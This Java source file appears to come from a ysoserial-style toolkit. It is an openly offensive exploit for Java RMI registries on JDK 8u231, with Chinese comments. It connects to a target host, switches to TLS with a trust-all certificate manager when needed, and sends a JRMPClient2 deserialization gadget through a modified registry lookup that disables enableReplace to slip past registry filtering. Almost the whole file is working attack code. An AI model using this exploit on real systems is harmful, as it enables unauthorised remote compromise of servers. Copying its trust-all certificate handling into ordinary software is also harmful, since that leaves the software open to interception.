package com.achuna33.Gadgets;
import com.achuna33.Gadgets.utils.ExecCheckingSecurityManager;
import com.achuna33.Gadgets.utils.Reflections;
import sun.rmi.transport.StreamRemoteCall;


import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.io.IOException;
import java.io.ObjectOutput;
import java.net.Socket;
import java.rmi.*;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.Operation;
import java.rmi.server.RMIClientSocketFactory;
import java.rmi.server.RemoteRef;
import java.security.cert.X509Certificate;
import java.util.concurrent.Callable;


@SuppressWarnings({"rawtypes", "unchecked"})
public class RMIRegistryExploitJdk8u231 {
    private static class TrustAllSSL implements X509TrustManager {
        private static final X509Certificate[] ANY_CA = {};
        public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
        public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
        public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
    }

    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
        public Socket createSocket(String host, int port) throws IOException {
            try {
                SSLContext ctx = SSLContext.getInstance("TLS");
                ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null);
                SSLSocketFactory factory = ctx.getSocketFactory();
                return factory.createSocket(host, port);
            } catch(Exception e) {
                throw new IOException(e);
            }
        }
    }

    public static void main(final String[] args) throws Exception {
        if ( args.length < 3 ) {

            System.exit(-1);
            return;
        }
        final String host = args[0];
        final int port = Integer.parseInt(args[1]);
        final String gadget = "JRMPClient2";
        final String command = args[2];


        Registry registry = LocateRegistry.getRegistry(host, port);
        final String className = RMIRegistryExploitJdk8u231.class.getPackage().getName() +  "." + gadget;
        System.out.println(className);
        final Class<?> payloadClass = (Class<?>) Class.forName(className);

        // test RMI registry connection and upgrade to SSL connection on fail
        try {
            registry.list();
        } catch(ConnectIOException ex) {
            registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());
        }

        // ensure payload doesn't detonate during construction or deserialization
        exploit(registry, payloadClass, command);
        System.exit(0);//不知为何，不加这个语句，程序不会主动退出。
    }

    public static void exploit(final Registry registry,
                               final Class<?> payloadClass,
                               final String command) throws Exception {
        new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {

            Object payload =new JRMPClient2().getObject(command);
            String name = "pwned" + System.nanoTime();
//            String name = "pwned";
            //Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
            Remote remote = (Remote) payload;//直接使用JRMPClient2生成的对象，不要包装map了
            try {
//			    registry.bind(name,remote);
//                bind(registry,name,remote);//经过改造的bind，但是依然受远程IP限制，还是需要使用lookup
                lookup(registry,remote);
            } catch (Throwable e) {
                e.printStackTrace();
            }
            //Utils.releasePayload(payloadObj, payload);
            return null;
        }});
    }

    /*经过改造的bind函数
    将enableReplace属性改为了false
     */
    public static void bind(Registry registry,String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
        try {
            Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};

            RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref");
            StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 0, 4905912898345647071L);

            try {
                ObjectOutput var4 = var3.getOutputStream();
                Reflections.setFieldValue(var4,"enableReplace",false);
                var4.writeObject(var1);
                var4.writeObject(var2);
            } catch (IOException var5) {
                throw new MarshalException("error marshalling arguments", var5);
            }

            ref.invoke(var3);
            ref.done(var3);
        } catch (RuntimeException var6) {
            throw var6;
        } catch (RemoteException var7) {
            throw var7;
        } catch (AlreadyBoundException var8) {
            throw var8;
        } catch (Exception var9) {
            throw new UnexpectedException("undeclared checked exception", var9);
        }
    }

    /*经过改造的lookup函数
    将enableReplace属性改为了false
    */
    public static void lookup(Registry registry,Remote var1) throws AccessException, AlreadyBoundException, RemoteException {
        try {
            Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};

            RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref");
            StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 2, 4905912898345647071L);

            try {
                ObjectOutput var4 = var3.getOutputStream();
                Reflections.setFieldValue(var4,"enableReplace",false);
                var4.writeObject(var1);
            } catch (IOException var5) {
                throw new MarshalException("error marshalling arguments", var5);
            }

            ref.invoke(var3);
            ref.done(var3);
        } catch (RuntimeException var6) {
            throw var6;
        } catch (RemoteException var7) {
            throw var7;
        } catch (AlreadyBoundException var8) {
            throw var8;
        } catch (Exception var9) {
            throw new UnexpectedException("undeclared checked exception", var9);
        }
    }
}
